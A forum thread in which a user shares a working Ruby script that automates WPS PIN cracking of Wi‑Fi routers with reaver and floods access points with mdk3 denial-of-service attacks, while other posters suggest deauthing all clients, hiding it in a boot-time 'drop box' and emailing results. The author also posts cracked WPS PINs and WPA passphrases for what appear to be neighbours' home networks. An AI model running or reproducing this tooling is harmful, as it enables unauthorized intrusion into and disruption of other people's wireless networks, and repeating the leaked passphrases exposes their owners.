i8igmac Posted February 2, 2015 Share Posted February 2, 2015 (edited) So, i have decided to share one of my projects, i figure i wont get much attention with this script, witch is why im sharing... i made a video i hope is quick to the point and informative... please share your comments... if there are any interested i may add some more functions to this script like capturing handshakes for cracking later... all you need is a linux machine, a wireless adapter (the more the better)... ruby and a ruby requirement open3... updated code... require 'open3' #on reboot stuff. device="" channel="" ap_mac="" essid="" @device_list=["wlan1"] @check=[] #sleep 30 #sleep if you plan to start this script from startup.rc... give drives a chance to load #`ifconfig wlan0 down` #`iwconfig wlan0 mode monitor` #`ifconfig wlan0 up` `ifconfig wlan1 down` `iwconfig wlan1 mode monitor` `ifconfig wlan1 up` #will not launch until the While true: at bottem #reaver attack and log def reaver(device, channel, ap_mac) Thread.start{ #`ifconfig #{device} down` #`iwconfig #{device} mode monitor` #`ifconfig #{device} up` #puts "Random mac..." Open3.popen3("iwconfig #{device} channel #{channel}") puts "change #{channel}" Open3.popen3("ifconfig #{device} down") puts "down" #Open3.popen3("macchanger #{device} -r") puts "changemac" Open3.popen3("ifconfig #{device} up") puts "up" puts "reaver -i #{device} -vv -b #{ap_mac} -c #{channel}" Open3.popen3("reaver -i #{device} -vv -K 1 -b #{ap_mac} -c #{channel}"){|i,o,t,p| i.puts("y") #tell reaver Yes to continue where the attack left off while line=o.gets if select([o],nil,nil,15) puts "#{device} #{ap_mac}: #{line}" log_all=File.open("log_all_#{ap_mac}",'a') log_all.puts("#{device} #{ap_mac}: #{line}") log_all.close #100.00% complete #Pin cracked in #WPS PIN: '12345678' #WPA PSK: 'asshole' #AP SSID: 'noob' # Log success to another file if line.include?("100.00%") || line.include?("Pin cracked") || line.include?("WPS PIN:") || line.include?("WPA PSK:") || line.include?("AP SSID:") success=File.open("sucess_#{ap_mac}",'a') success.puts("#{device} #{ap_mac}: #{line}") success.close end if line.include?("WARNING: Failed to associate") || line.include?("WARNING: 25 successive start failures") || line.include?("Detected AP rate limiting") || line.include?("WARNING: 10 failed connections in a row") puts "#{device} #{ap_mac}: killing thread" @check.delete(device)#remove the card from the list... can now be used in a new process Process.kill("KILL",p.pid) end else puts "#{device} #{ap_mac}: TIMEOUT" @check.delete(device) Process.kill("KILL",p.pid) break end end @check.delete(device) Process.kill("KILL",p.pid) } @check.delete(device) Process.kill("KILL",p.pid) } #thread.start end #will not launch until the While true: at bottem def mdk3(device, channel, ap_mac, essid) Open3.popen3("iwconfig #{device} channel #{channel}") Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} a -i #{ap_mac} -m -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} m -t #{ap_mac} -j -w 1 -n 1024 -s 1024"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} b -n #{essid} -g -w -m -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } Thread.start{Open3.popen3("mdk3 #{device} w -e #{essid} -c #{channel}"){|i,o,t| while line=o.gets; puts line; end } } end #44:94:FC:3B:E9:16 7 ANDY DALTON SOUR HOUR #28:C6:8E:A3:10:7A 11 NETGEAR01 #the main reason for this script # if you let reaver run for to long, it may hang with out any data output (frozen state)... so killall and restart #just added a few extra dos attacks #reaver -i #{device} -vv --dh-small -b 20:76:00:1C:D9:C8 -c 6 #reaver -i wlan2 -vv --dh-small -b 4C:60:DE:31:C3:79 -c 8 def gather() scan_complete=false while scan_complete==false @device_list.each{|wlan| if not @check.include?(wlan) puts "#{wlan} scanning with wash" buff="" Open3.popen3("wash -i #{wlan} -C"){|i,o,t,p| Thread.start{sleep 25; Process.kill("KILL",p.pid)}; while line=o.gets; if not line.nil?; buff<<line; end; end} @list=[] buff.encode!('UTF-8', 'binary', invalid: :replace, undef: :replace, replace: '').each_line{|x| if x.include?("No"); @list<<"#{x.split[1]} #{x.split[0]}"; end; } puts @list scan_complete=true break else puts "waiting for device to free up... redo" sleep 3 next end } end end try_again=false while true gather() @list.each{|stack| #puts "trying #{stack}" sleep 1 @device_list.each{|wlan| if not @check.include?(wlan) puts @check @check<<wlan #reaver("wlan2", "6", "20:76:00:1C:D9:C8") reaver("#{wlan.chomp}","#{stack.split[0]}", "#{stack.split[1]}") try_again=false break else try_again=true end } if try_again==true redo end } end Edited September 15, 2015 by i8igmac Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 11, 2015 Author Share Posted September 11, 2015 I decided to open this scriptlast night and launch this attack. (In a controlled test environment of course)in about 4 hours I have cracked 4 wireless access points... it really is a success! The way this algorithm controls reaver and can micro manage multiple alfa cards to quickly alternate threw a list of access points... set it and forget it... only need kali and a wifi card, the more the better!I really need to work on my presentation... EDIT: check the new script above and video Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted September 11, 2015 Share Posted September 11, 2015 (edited) Hey that's pretty neat right there I'm gonna check this out in a bit. Like I said in your video comments you should try updating your script to work with the pixie dust attack. Edited September 11, 2015 by ZaraByte Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 12, 2015 Author Share Posted September 12, 2015 Hey that's pretty neat right there I'm gonna check this out in a bit. Like I said in your video comments you should try updating your script to work with the pixie dust attack. ill look into this pixie dust attack. I may put this on a github... ill clean it up and correct the output... currently works well when I place this script in my /etc/rc.local... just needs to wait for the drivers to load before the script starts... simply sleep for 30 seconds... Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted September 12, 2015 Share Posted September 12, 2015 ill look into this pixie dust attack. I may put this on a github... ill clean it up and correct the output... currently works well when I place this script in my /etc/rc.local... just needs to wait for the drivers to load before the script starts... simply sleep for 30 seconds... I'd like to know how you install open3 I've never messed with Ruby before so this is new to me I was planning to order me one of these http://amzn.com/B0088PPFP4 and turn it into a drop box since it has a built in battery on it. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 14, 2015 Author Share Posted September 14, 2015 I'd like to know how you install open3 I've never messed with Ruby before so this is new to me I was planning to order me one of these http://amzn.com/B0088PPFP4 and turn it into a drop box since it has a built in battery on it.I updated the script above, I didn't change mutch, you will notice on the reaver command -K 1It seems that reaver is attacking the chip driver, K 1,2,3... I would think reaver is capable of detecting the wireless chip and performing this attack with out even declaring -K I can't remember how I installed open 3.I believe installing Metasploit May include open 3 Gem install open3 Apt-cache search open3 there is a github I believe... You can require ' /home/some/git/clone/location/open3.rb' This device u posted, looks interesting... I'm interested in a device advertised on the kali home page, 'trim slice' runs on 12v. Quote Link to comment Share on other sites More sharing options...
vailixi Posted September 15, 2015 Share Posted September 15, 2015 (edited) This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it. This is right there with wifite for easy mode. It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this? Actually you could just put something like this into the script where the reaver wps attack fails. Open3.popen3(wifite -b #{ap_mac}) This just looks right but I don't know ruby. Edited September 15, 2015 by vailixi Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 15, 2015 Author Share Posted September 15, 2015 This is a pretty sweet script. I've thought about doing something like this but I really didn't know how to go about it. This is right there with wifite for easy mode. It would be cool if there was a script for automatically detecting associated wireless clients and deauthenticating them for handshakes. Then a guy could go full beast mode and just destroy the wifis. I'm not sure how to get outputs from programs like reaver and use them as variables. Anybody want to talk about this? Actually you could just put something like this into the script where the reaver wps attack fails. Open3.popen3(wifite -b #{ap_mac}) This just looks right but I don't know ruby. i have done this before, using 2 cards, set one card to log the handshakes, and another card to deauth all clients... i spent some time scripting all this kungfoo and was apart of my script, but turns out, i found a simply way... airodump-ng wlan0 mdk3 wlan1 d (deauthenticate all clients from all access points) Quote Link to comment Share on other sites More sharing options...
vailixi Posted September 15, 2015 Share Posted September 15, 2015 Does this option run a single deauthentication? Or does it do it contiunuously creating a denial of service? mdk3 wlan1 d Or can you set the number of deauth requests like you can with aireplay-ng? Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 15, 2015 Author Share Posted September 15, 2015 I don't remember exactly. It looks like it cycles threw all clients... I tested it for about a minute... I should start a little tutorial on ruby automated wifi attacks... starting with a custom deauth attack using airebase... Thread.start{Open3.popen3("airodump-ng -w log -d wlan1")} This will start logging in plain text a csv file witch holds all the clients associated with a access point. All the information you need is easy access in ruby... just need to orginize everything and launch a attck of your choice... Quote Link to comment Share on other sites More sharing options...
IvanDoe Posted September 16, 2015 Share Posted September 16, 2015 Thanks for sharing this :) I'll try it out. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 16, 2015 Author Share Posted September 16, 2015 Thanks for sharing this :) I'll try it out. if you install open3 successfully, post your install method... I never had any problems but can't remember my install method Quote Link to comment Share on other sites More sharing options...
IvanDoe Posted September 16, 2015 Share Posted September 16, 2015 (edited) ​ ​ ​ if you install open3 successfully, post your install method... I never had any problems but can't remember my install method ​Sure, ill try to set it today or tomorrow. ​ ​I didn't code in ruby before but it seems like i need to add wlan2 here? ​ ​@device_list=["wlan1"] ​Not sure what syntax ruby uses to use multiple parameters? ​ ​From code it seems like each wifi card trys to crack its own access point? ​In video i don't see script running mdk3 attack on access point but i see function for attack in script? ​ ​Thanks for help, i just want to figure out how it actually works :) Edited September 16, 2015 by IvanDoe Quote Link to comment Share on other sites More sharing options...
IvanDoe Posted September 16, 2015 Share Posted September 16, 2015 Ok so i tried script via vmware, i do have raspberry around but figured i'd try it in vm first. ​ ​I used kali 2, didn't have to install open3, worked out of the box, i just had to change interface name in script, wlan1/wlan2. ​ ​Stoped it after few minutes but it seems to work cool, i'll set kali on raspberry and try it out as dropbox somewhere :) ​ ​Anyway as i posted yesterday, alfa awus036neh seems to have driver issues or something else with kali 2.0 (monitor mode won't show any access points), so i used older awus036h with this script. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 18, 2015 Author Share Posted September 18, 2015 (edited) Ok so i tried script via vmware, i do have raspberry around but figured i'd try it in vm first. ​ ​I used kali 2, didn't have to install open3, worked out of the box, i just had to change interface name in script, wlan1/wlan2. ​ ​Stoped it after few minutes but it seems to work cool, i'll set kali on raspberry and try it out as dropbox somewhere :) ​ ​Anyway as i posted yesterday, alfa awus036neh seems to have driver issues or something else with kali 2.0 (monitor mode won't show any access points), so i used older awus036h with this script. glad to see it worked for you... i figure it would work out of the box on a kali machine... Update on my findings using one wireless card to attack multiple access points in a multi-threaded or multi-processed fashion... i did successfully crack a new device with this configuration... @device_list=["mon0","mon1","mon2", "wlan1"] i ran airmon-ng start wlan1 several times on a single wireless card to create multiple tab devices... then launched the script... this script is designed to micro manage multiple interfaces... i would like to see if any one abjects to this kind of setup... i have done this before in the past with other kinds of attacks... Take a look at this scan of airodump... airodump-ng wlan1 --essid-regex=my z0:4A:03:C3:D6:B5 -55 17 0 0 11 54 . WPA2 CCMP PSK myqwest6671 z8:39:44:5B:48:AC -56 20 0 0 6 54e WPA2 CCMP PSK myqwest6322 z0:26:88:E2:CF:28 -60 6 1 0 11 54e WPA2 CCMP PSK myqwest3957 z0:24:7B:6F:A5:D4 -66 6 1 0 11 54 WPA2 CCMP PSK myqwest6947 airodump-ng wlan1 --essid-regex=HOME z4:04:15:0F:42:14 -48 11 0 0 11 54e WPA2 CCMP PSK HOME-7EC8_EXT zC:35:40:75:38:99 -53 10 0 0 1 54e WPA2 CCMP PSK HOME-3899 z8:7B:8C:26:EE:F5 -54 3 2 0 1 54e WPA2 CCMP PSK HOME-051F_RE z8:F7:C7:66:19:8F -56 11 0 0 11 54e WPA2 CCMP PSK HOME-198F z0:71:C2:EF:7E:D0 -56 10 0 0 11 54e. WPA2 CCMP PSK HOME-06B1-2.4 z4:AB:F0:11:D0:90 -62 4 0 0 6 54e WPA2 CCMP PSK HOME-D092 z4:BE:F7:E8:BA:48 -63 4 0 0 6 54e. WPA2 CCMP PSK HOME-5AF7-2.4 z0:1D:D4:8C:19:00 -63 5 0 0 6 54e WPA2 CCMP PSK HOME-1902 z4:85:2A:97:9D:D8 -67 2 0 0 6 54e. WPA2 CCMP PSK HOME-7804-2.4 why would you think these routers share the same name? perhaps these are identical devices, identical firmware or ihardware issued by identical Internet service providers...Look at these cracked pins... ill bet you money i can guess the default pin for all the routers above! wlan1 z0:26:88:E2:CF:28: [+] WPS PIN: '12345670' wlan1 z0:26:88:E2:CF:28: [+] WPA PSK: 'pupy20103251' wlan1 z0:26:88:E2:CF:28: [+] AP SSID: 'myqwest3957' wlan1 z0:71:C2:EF:7E:D0: [+] WPS PIN: '12345670' wlan1 z0:71:C2:EF:7E:D0: [+] WPA PSK: '9H3TDTH9HVCPDT7Y' wlan1 z0:71:C2:EF:7E:D0: [+] AP SSID: 'HOME-06B1-2.4' mon1 z0:76:00:1C:D9:C8: [+] WPS PIN: '12345670' mon1 z0:76:00:1C:D9:C8: [+] WPA PSK: 'i6bz7dd8s7haxt' mon1 z0:76:00:1C:D9:C8: [+] AP SSID: 'myqwest4681' wlan1 z8:39:44:5B:48:AC: [+] WPS PIN: '12345670' wlan1 z8:39:44:5B:48:AC: [+] WPA PSK: '003368f2006dd11b8b052f0995' wlan1 z8:39:44:5B:48:AC: [+] AP SSID: 'myqwest6322' wlan2 z4:E0:C5:03:D9:23: [+] WPS PIN: '00000000' wlan2 z4:E0:C5:03:D9:23: [+] WPA PSK: 'akDztnO2giB53LYSUr5JHUSQ4xJD78' wlan2 z4:E0:C5:03:D9:23: [+] AP SSID: 'SEC_LinkShare_f50c6f' So, try to imagine why reaver has failed to crack all these default pins...SIGNAL STRENGTH!!! the success packet holding all the gold just never made it to your machine and reaver reported a failed attack after long hours of work... to build a successful attack, all i need is a list of default pins and a directinal antenna... Bobs your uncle... PeWnND lol Edited September 18, 2015 by i8igmac Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted September 22, 2015 Share Posted September 22, 2015 Can I ask how many wireless cards your using I'd like to do a video on this and credit you in the video. Also which version of Kali Linux are you using for your Pi is it 2.0 or the older version of Kali Linux ARM. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 23, 2015 Author Share Posted September 23, 2015 currently, my raspberry pi in my attack space, is running kali 1 updated reaver that includes pixiedust Aircrack-ng 1.2 rc1 (i dont think it will matter) how many cards do you have? my previous post i was successful with only using one card and creating multiple tap interfaces mon0 mon1 mon2 mon3 there is a bit of a adjustment i need to make to better performance with this method... Your better off running the script like below... @device_list=ARGV[0] change this line at the top of the script... open several terminals, and run like this... of course stop network managers and such... ruby script.rb wlan0 ruby script.rb wlan1 ruby script.rb wlan2 ruby script.rb wlan4 ruby script.rb wlan5 there is so much to explain and i will fail to get the information out properly ,-) different devices show different scan results, so, same goes for devices using different antennas... i hope to get more time to modify things and help you create a better video! i feel like a nerd talking to his labtop Quote Link to comment Share on other sites More sharing options...
deadlyhabit Posted September 24, 2015 Share Posted September 24, 2015 (edited) Not to familiar with ruby (something new to delve into), but would it be possible to add/modify the script to send an email on success to something like gmail which alongside a cell phone alert let's you know it's done? Like in python def send_email(user, pwd, recipient, subject, body): import smtplib gmail_user = user gmail_pwd = pwd FROM = user TO = recipient if type(recipient) is list else [recipient] SUBJECT = subject TEXT = body # Prepare actual message message = """\From: %s\nTo: %s\nSubject: %s\n\n%s """ % (FROM, ", ".join(TO), SUBJECT, TEXT) try: server = smtplib.SMTP("smtp.gmail.com", 587) server.ehlo() server.starttls() server.login(gmail_user, gmail_pwd) server.sendmail(FROM, TO, message) server.close() print 'successfully sent the mail' except: print "failed to send mail" http://stackoverflow.com/questions/10147455/trying-to-send-email-gmail-as-mail-provider-using-python Working on something similar in python to automate attacks for Kali, and ideally suited for nethunter and potentially a bluetooth paired android smartwatch as well. Edited September 24, 2015 by deadlyhabit Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted September 24, 2015 Share Posted September 24, 2015 I'm getting errors after pasting it in vi and trying to run this on net hunter. root@kali:~# ./autopwn.rb ./autopwn.rb: line 1: require: command not found ./autopwn.rb: line 8: @device_list=[wlan1]: command not found ./autopwn.rb: line 9: @check=[]: command not found ./autopwn.rb: line 19: syntax error near unexpected token `(' ./autopwn.rb: line 19: `def reaver(device, channel, ap_mac)' Would be nice if someone could make this into a bash script it be more compatible. Quote Link to comment Share on other sites More sharing options...
DataHead Posted September 24, 2015 Share Posted September 24, 2015 i'd like to make note that -vvv is required for the newer / updated builds of our reaver fork for it to work with pixiedust collection and -K 1. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 25, 2015 Author Share Posted September 25, 2015 (edited) I'm getting errors after pasting it in vi and trying to run this on net hunter. root@kali:~# ./autopwn.rb ./autopwn.rb: line 1: require: command not found ./autopwn.rb: line 8: @device_list=[wlan1]: command not found ./autopwn.rb: line 9: @check=[]: command not found ./autopwn.rb: line 19: syntax error near unexpected token `(' ./autopwn.rb: line 19: `def reaver(device, channel, ap_mac)' Would be nice if someone could make this into a bash script it be more compatible.Nethunter is kali?Root@kali:~#ruby autopwn.rb @datahead I don't know much about reavers pixisust fuction. my understanding, k1 k2 k3 will target a specific chip driver? Edited September 25, 2015 by i8igmac Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted September 25, 2015 Share Posted September 25, 2015 Nethunter is kali? Root@kali:~#ruby autopwn.rb Working now! was trying to run as a bash script running with ruby first works just fine no issues! Script works really nice but this script would be epic if someone converted it to a Bash script because then it might work on devices like the pineapple. Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 25, 2015 Author Share Posted September 25, 2015 I'm sure it can be done, I never bothered with bash... I chose ruby because metasploit developers chose ruby... And I facking luv it! Quote Link to comment Share on other sites More sharing options...
ZaraByte Posted September 25, 2015 Share Posted September 25, 2015 (edited) I'm sure it can be done, I never bothered with bash... I chose ruby because metasploit developers chose ruby... And I facking luv it! It's be cool so see it as a bash script im not sure if you can install ruby on OpenWRT or not but I'd love to put this script on a TP-LINK MR3040 bad that be so awesome to use could but the only issue is wireless card sadly I found out the TP-LINK MR3040 needs a USB drive to hold files cause I don't think it has enough internal memory to hold a lot of stuff. This ruby works fine on the Nexus 7 2013 WiFi tablet with nethunter 2.0 installed just need to follow deadlyhabit guide on getting monitor mode to work. Edited September 25, 2015 by ZaraByte Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 25, 2015 Author Share Posted September 25, 2015 a quick search and I found ruby install guides for openwrt. I believe in kali, openwrt has to many limitations... I plan on buying a new device to replace the pi... the amount of cords connected to my pi resembles a hot mess... If I can eliminate the powered usb hub, maybe i can with a 12v orange slice? Mobile is key Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.